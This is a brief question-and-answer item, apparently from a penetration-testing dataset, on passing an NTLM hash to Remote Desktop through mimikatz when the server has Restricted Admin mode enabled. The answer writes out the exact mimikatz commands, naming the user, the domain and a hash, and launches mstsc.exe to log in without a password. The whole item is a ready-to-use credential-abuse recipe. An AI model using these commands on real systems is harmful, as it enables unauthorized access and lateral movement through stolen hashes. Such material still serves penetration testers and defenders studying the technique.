How can mimikatz be used to pass the hash for Remote Desktop when Restricted Admin mode is enabled?

With administrator privileges, run `mimikatz` and execute: `privilege::debug` then `sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"`. This launches the Remote Desktop client with the given hash, and since Restricted Admin mode is enabled on the server, you can log in without needing a password. This technique relies on the client and server both supporting Restricted Admin mode, as explained in Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode).